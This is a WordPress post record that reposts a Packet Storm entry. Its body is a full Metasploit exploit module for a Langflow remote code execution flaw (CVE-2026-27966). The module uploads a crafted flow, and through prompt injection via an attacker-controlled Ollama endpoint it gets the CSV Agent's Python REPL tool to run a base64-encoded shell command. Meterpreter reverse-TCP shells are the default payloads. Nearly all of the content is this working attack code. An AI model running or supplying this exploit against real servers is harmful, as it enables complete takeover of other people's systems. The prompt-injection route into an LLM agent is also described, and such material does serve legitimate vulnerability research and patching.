{"id":48986,"date":"2026-04-23T13:51:27","date_gmt":"2026-04-23T13:51:27","guid":{"rendered":"http:\/\/localhost\/?p=48986"},"modified":"2026-04-23T13:51:27","modified_gmt":"2026-04-23T13:51:27","slug":"langflow-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=48986","title":{"rendered":"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-23T17:39:29&#8243;,&#8221;description&#8221;:&#8221;The CSV Agent node in Langflow hardcodes allowdangerouscode=True, which automatically exposes the LangChains Python REPL tool pythonreplast. As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection,&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Langflow Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219709&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-27966&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::HttpClient\\n      prepend Msf::Exploit::Remote::AutoCheck\\n      include Msf::Post::File\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Langflow RCE&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              The CSV Agent node in Langflow hardcodes allow_dangerous_code=True, which automatically exposes LangChain&#8217;s Python REPL tool (python_repl_ast).\\n              As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE).\\n            },\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;weblover12&#8217;,        # Vulnerability discovery and PoC\\n              &#8216;Takahiro Yokoyama&#8217;  # Metasploit module\\n            ],\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;CVE&#8217;, &#8216;2026-27966&#8217;],\\n              [&#8216;GHSA&#8217;, &#8216;3645-fxcv-hqr4&#8217;],\\n            ],\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                &#8216;Linux Command&#8217;, {\\n                  &#8216;Arch&#8217; =\\u003e [ ARCH_CMD ], &#8216;Platform&#8217; =\\u003e [ &#8216;unix&#8217;, &#8216;linux&#8217; ], &#8216;Type&#8217; =\\u003e :nix_cmd,\\n                  &#8216;DefaultOptions&#8217; =\\u003e {\\n                    &#8216;PAYLOAD&#8217; =\\u003e &#8216;cmd\/linux\/http\/x64\/meterpreter_reverse_tcp&#8217;\\n                  }\\n                }\\n              ],\\n              [\\n                &#8216;Python payload&#8217;,\\n                {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;python&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e ARCH_PYTHON,\\n                  &#8216;DefaultOptions&#8217; =\\u003e { &#8216;PAYLOAD&#8217; =\\u003e &#8216;python\/meterpreter\/reverse_tcp&#8217; }\\n                }\\n              ]\\n            ],\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;DefaultOptions&#8217; =\\u003e {\\n              &#8216;WfsDelay&#8217; =\\u003e 300,\\n              &#8216;FETCH_DELETE&#8217; =\\u003e true\\n            },\\n            &#8216;Payload&#8217; =\\u003e {\\n              &#8216;BadChars&#8217; =\\u003e &#8216;\\&#8221;&#8216;\\n            },\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2026-02-25&#8217;,\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Stability&#8217; =\\u003e [ CRASH_SAFE, ],\\n              &#8216;SideEffects&#8217; =\\u003e [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\\n              &#8216;Reliability&#8217; =\\u003e [ REPEATABLE_SESSION, ]\\n            }\\n          )\\n        )\\n        register_options(\\n          [\\n            Opt::RPORT(7860),\\n            OptString.new(&#8216;APIKEY&#8217;, [ true, &#8216;Langflow API key to interact with Langflow.&#8217;, &#8221; ]),\\n            OptString.new(&#8216;OLLAMAAPIURI&#8217;, [ true, &#8216;Endpoint of the OLLAMA API controlled by an attacker.&#8217;, &#8221; ]),\\n            OptString.new(&#8216;MODEL&#8217;, [ true, &#8216;Valid ollama model name.&#8217;, &#8221; ]),\\n          ]\\n        )\\n      end\\n    \\n      def check\\n        res = send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v1\/version&#8217;)\\n        })\\n        return Exploit::CheckCode::Unknown(&#8216;Unexpected server reply.&#8217;) unless res\\u0026.code == 200\\n    \\n        json_version = res\\u0026.get_json_document\\u0026.fetch(&#8216;version&#8217;, nil)\\n        return Exploit::CheckCode::Unknown(&#8216;Failed to parse version.&#8217;) unless json_version\\n    \\n        version = Rex::Version.new(json_version)\\n        return Exploit::CheckCode::Unknown(&#8216;Failed to get version.&#8217;) unless version\\n    \\n        return Exploit::CheckCode.Safe(\\&#8221;Version #{version} detected. Which is not vulnerable.\\&#8221;) if version \\u003e= Rex::Version.new(&#8216;1.8.0&#8217;)\\n    \\n        # check if API key is valid\\n        res = send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v1\/users\/whoami&#8217;),\\n          &#8216;headers&#8217; =\\u003e {\\n            &#8216;x-api-key&#8217; =\\u003e datastore[&#8216;APIKEY&#8217;]\\n          }\\n        })\\n        return Exploit::CheckCode::Appears(\\&#8221;Version #{version} detected and API key is valid. Which is vulnerable.\\&#8221;) if res\\u0026.code == 200\\n    \\n        Exploit::CheckCode.Safe(\\&#8221;Version #{version} detected and API key is invalid. Which is not vulnerable.\\&#8221;)\\n      end\\n    \\n      def exploit\\n        res = send_request_cgi({\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri, &#8216;api\/v1\/projects\/&#8217;),\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;headers&#8217; =\\u003e {\\n            &#8216;x-api-key&#8217; =\\u003e datastore[&#8216;APIKEY&#8217;]\\n          },\\n          &#8216;data&#8217; =\\u003e {\\n            &#8216;name&#8217; =\\u003e rand_text_alphanumeric(8),\\n            &#8216;description&#8217; =\\u003e &#8216;string&#8217;,\\n            &#8216;components_list&#8217; =\\u003e [],\\n            &#8216;flows_list&#8217; =\\u003e []\\n          }.to_json\\n        })\\n        @folder_id = res\\u0026.get_json_document\\u0026.fetch(&#8216;id&#8217;, nil)\\n        fail_with(Failure::Unknown, &#8216;Failed to create a new project.&#8217;) unless @folder_id\\n        print_status(\\&#8221;Project: #{@folder_id}\\&#8221;)\\n    \\n        # construct POST data\\n        fname = \\&#8221;#{rand_text_alphanumeric(8)}.csv\\&#8221;\\n        data = Rex::MIME::Message.new\\n        data.add_part(\\&#8221;#{rand_text_alphanumeric(2)},#{rand_text_alphanumeric(2)}\\&#8221;, &#8216;application\/csv&#8217;, nil, \\&#8221;form-data; name=\\\\\\&#8221;file\\\\\\&#8221;; filename=\\\\\\&#8221;#{fname}\\\\\\&#8221;\\&#8221;)\\n        res = send_request_cgi({\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri, &#8216;api\/v2\/files&#8217;),\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;headers&#8217; =\\u003e {\\n            &#8216;x-api-key&#8217; =\\u003e datastore[&#8216;APIKEY&#8217;]\\n          },\\n          &#8216;ctype&#8217; =\\u003e \\&#8221;multipart\/form-data; boundary=#{data.bound}\\&#8221;,\\n          &#8216;data&#8217; =\\u003e data.to_s\\n        })\\n        path = res\\u0026.get_json_document\\u0026.fetch(&#8216;path&#8217;)\\n        fail_with(Failure::Unknown, &#8216;Failed to upload a csv file.&#8217;) unless path\\n        @fid = res\\u0026.get_json_document\\u0026.fetch(&#8216;id&#8217;)\\n    \\n        exploit_data = exploit_data(&#8216;CVE-2026-27966&#8217;, &#8216;cve_2026_27966.json&#8217;)\\n        exploit_data = exploit_data.gsub(&#8216;__FOLDERID__&#8217;, @folder_id)\\n        exploit_data = exploit_data.gsub(&#8216;__MODELNAME__&#8217;, datastore[&#8216;MODEL&#8217;])\\n        exploit_data = exploit_data.gsub(&#8216;__OLLAMAAPIURI__&#8217;, datastore[&#8216;OLLAMAAPIURI&#8217;])\\n        exploit_data = exploit_data.gsub(&#8216;__FILEPATH__&#8217;, path)\\n        case target[&#8216;Arch&#8217;]\\n        when ARCH_PYTHON\\n          payload_data = payload.encode\\n        else\\n          payload_data = \\&#8221;__import__(&#8216;os&#8217;).system(&#8216;echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|\/bin\/sh&#8217;)\\&#8221;\\n        end\\n        exploit_data = exploit_data.gsub(&#8216;__PAYLOAD__&#8217;, payload_data)\\n        exploit_data = exploit_data.gsub(&#8216;__NAME__&#8217;, rand_text_alphanumeric(8))\\n        # construct POST data\\n        data = Rex::MIME::Message.new\\n        data.add_part(exploit_data, &#8216;application\/json&#8217;, nil, \\&#8221;form-data; name=\\\\\\&#8221;file\\\\\\&#8221;; filename=\\\\\\&#8221;#{rand_text_alphanumeric(3..9)}.json\\\\\\&#8221;\\&#8221;)\\n    \\n        # Import a flow\\n        res = send_request_cgi({\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri, &#8216;api\/v1\/flows\/upload\/&#8217;),\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;ctype&#8217; =\\u003e \\&#8221;multipart\/form-data; boundary=#{data.bound}\\&#8221;,\\n          &#8216;data&#8217; =\\u003e data.to_s,\\n          &#8216;vars_get&#8217; =\\u003e { &#8216;folder_id&#8217; =\\u003e @folder_id },\\n          &#8216;headers&#8217; =\\u003e {\\n            &#8216;x-api-key&#8217; =\\u003e datastore[&#8216;APIKEY&#8217;]\\n          }\\n        })\\n        fail_with(Failure::Unknown, &#8216;Temporary failed to import a flow.&#8217;) unless res\\u0026.get_json_document.is_a?(Array)\\n        flow_id = res\\u0026.get_json_document\\u0026.first\\u0026.fetch(&#8216;id&#8217;, nil)\\n        fail_with(Failure::Unknown, &#8216;Failed to import a flow.&#8217;) unless flow_id\\n        print_status(\\&#8221;Flow: #{flow_id}\\&#8221;)\\n    \\n        # Execute\\n        res = send_request_cgi({\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri, \\&#8221;api\/v1\/build\/#{flow_id}\/flow\\&#8221;),\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;headers&#8217; =\\u003e {\\n            &#8216;x-api-key&#8217; =\\u003e datastore[&#8216;APIKEY&#8217;]\\n          }\\n        })\\n        job = res\\u0026.get_json_document\\u0026.fetch(&#8216;job_id&#8217;)\\n        fail_with(Failure::Unknown, &#8216;Unexpected server reply.&#8217;) unless job\\n        print_status(\\&#8221;Job: #{job}\\&#8221;)\\n        print_status(&#8216;Waiting&#8230;&#8217;)\\n      end\\n    \\n      def cleanup\\n        super\\n        if @fid\\n          send_request_cgi({\\n            &#8216;uri&#8217; =\\u003e normalize_uri(target_uri, \\&#8221;api\/v2\/files\/#{@fid}\\&#8221;),\\n            &#8216;method&#8217; =\\u003e &#8216;DELETE&#8217;,\\n            &#8216;headers&#8217; =\\u003e {\\n              &#8216;x-api-key&#8217; =\\u003e datastore[&#8216;APIKEY&#8217;]\\n            }\\n          })\\n        end\\n        if @folder_id\\n          send_request_cgi({\\n            &#8216;uri&#8217; =\\u003e normalize_uri(target_uri, \\&#8221;api\/v1\/projects\/#{@folder_id}\\&#8221;),\\n            &#8216;method&#8217; =\\u003e &#8216;DELETE&#8217;,\\n            &#8216;headers&#8217; =\\u003e {\\n              &#8216;x-api-key&#8217; =\\u003e datastore[&#8216;APIKEY&#8217;]\\n            }\\n          })\\n        end\\n      end\\n    \\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/219709&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/219709\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-23T17:39:29&#8243;,&#8221;description&#8221;:&#8221;The CSV Agent node in Langflow hardcodes allowdangerouscode=True, which automatically exposes the LangChains Python REPL tool pythonreplast. As a result, an attacker can execute arbitrary&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-48986","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=48986\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-23T17:39:29&#8243;,&#8221;description&#8221;:&#8221;The CSV Agent node in Langflow hardcodes allowdangerouscode=True, which automatically exposes the LangChains Python REPL tool pythonreplast. As a result, an attacker can execute arbitrary...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=48986\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-23T13:51:27+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48986#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48986\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709\",\"datePublished\":\"2026-04-23T13:51:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48986\"},\"wordCount\":1305,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48986#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48986\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48986\",\"name\":\"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-23T13:51:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48986#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48986\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48986#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=48986","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-23T17:39:29&#8243;,&#8221;description&#8221;:&#8221;The CSV Agent node in Langflow hardcodes allowdangerouscode=True, which automatically exposes the LangChains Python REPL tool pythonreplast. As a result, an attacker can execute arbitrary...","og_url":"https:\/\/zero.redgem.net\/?p=48986","og_site_name":"zero redgem","article_published_time":"2026-04-23T13:51:27+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=48986#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=48986"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709","datePublished":"2026-04-23T13:51:27+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=48986"},"wordCount":1305,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=48986#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=48986","url":"https:\/\/zero.redgem.net\/?p=48986","name":"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-23T13:51:27+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=48986#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=48986"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=48986#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Langflow Remote Code Execution_PACKETSTORM:219709"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48986","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=48986"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48986\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=48986"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=48986"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=48986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}